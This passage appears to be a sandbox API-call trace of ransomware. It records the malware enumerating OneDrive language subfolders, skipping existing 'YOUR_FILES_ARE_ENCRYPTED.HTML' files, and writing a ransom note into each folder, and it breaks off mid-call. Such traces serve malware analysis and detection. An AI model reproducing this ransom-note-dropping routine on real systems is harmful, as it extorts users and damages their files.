[0161.895] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.895] lstrlenW (lpString=".mui") returned 4 [0161.895] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.895] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6160e30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6160e30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6160e30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ea8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.895] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.895] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\mk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.895] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.898] CloseHandle (hObject=0x5b8) returned 1 [0161.898] GetProcessHeap () returned 0x270000 [0161.899] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.899] 
FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6160e30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6350010, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6350010, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ml-in", cAlternateFileName="")) returned 1 [0161.899] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ml-in") returned 77 [0161.899] GetProcessHeap () returned 0x270000 [0161.899] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.899] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ml-in" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ml-in") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ml-in" [0161.899] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ml-in", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ml-in\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ml-in\\*" [0161.899] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ml-in\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6160e30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6350010, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6350010, 
ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.900] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6160e30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6350010, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6350010, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.900] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6350010, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6350010, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6350010, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x14eb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.900] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ml-in\\FileSync.LocalizedResources.dll.mui") returned 113 [0161.900] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.900] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.900] lstrlenW (lpString=".mui") returned 4 [0161.900] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.900] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, 
ftCreationTime.dwLowDateTime=0xa6350010, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6350010, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6350010, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x14eb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.900] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.900] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ml-in\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0161.900] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ml-in\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ml-in\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.901] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.903] CloseHandle (hObject=0x5b8) returned 1 [0161.904] GetProcessHeap () returned 0x270000 [0161.904] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.904] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6350010, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa65d7770, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa65d7770, 
ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="mn", cAlternateFileName="")) returned 1 [0161.920] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mn") returned 74 [0161.920] GetProcessHeap () returned 0x270000 [0161.920] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.920] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mn" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mn") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mn" [0161.920] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mn", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mn\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mn\\*" [0161.920] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mn\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6350010, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa65d7770, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa65d7770, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.921] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6350010, 
ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa65d7770, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa65d7770, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.921] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa65d7770, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa65d7770, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa65d7770, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.921] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mn\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.921] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.921] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.921] lstrlenW (lpString=".mui") returned 4 [0161.921] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.921] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa65d7770, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa65d7770, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa65d7770, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", 
cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.921] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.921] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mn\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.921] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mn\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\mn\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.922] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.924] CloseHandle (hObject=0x5b8) returned 1 [0161.925] GetProcessHeap () returned 0x270000 [0161.926] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.926] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa65d7770, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa67c6950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa67c6950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="mr", cAlternateFileName="")) returned 1 [0161.926] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mr") returned 74 [0161.926] GetProcessHeap () returned 0x270000 
[0161.926] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.926] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mr" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mr") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mr" [0161.926] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mr", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mr\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mr\\*" [0161.926] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mr\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa65d7770, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa67c6950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa67c6950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.926] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa65d7770, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa67c6950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa67c6950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.927] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: 
lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa67c6950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa67c6950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa67c6950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.927] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mr\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.927] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.927] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.927] lstrlenW (lpString=".mui") returned 4 [0161.927] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.927] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa67c6950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa67c6950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa67c6950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.927] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.927] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mr\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.927] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mr\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\mr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.928] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.930] CloseHandle (hObject=0x5b8) returned 1 [0161.931] GetProcessHeap () returned 0x270000 [0161.932] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.932] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa67c6950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6a4e0b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6a4e0b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ms", cAlternateFileName="")) returned 1 [0161.932] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ms") returned 74 [0161.932] GetProcessHeap () returned 0x270000 [0161.932] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.932] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ms" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ms") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ms" [0161.932] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ms", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ms\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ms\\*" [0161.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ms\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa67c6950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6a4e0b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6a4e0b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.932] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa67c6950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6a4e0b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6a4e0b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.932] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6a4e0b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6a4e0b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6a4e0b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12cb0, dwReserved0=0x0, 
dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.932] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ms\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.933] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.933] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.933] lstrlenW (lpString=".mui") returned 4 [0161.933] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.933] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6a4e0b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6a4e0b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6a4e0b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12cb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.933] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.933] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ms\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.933] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ms\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ms\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, 
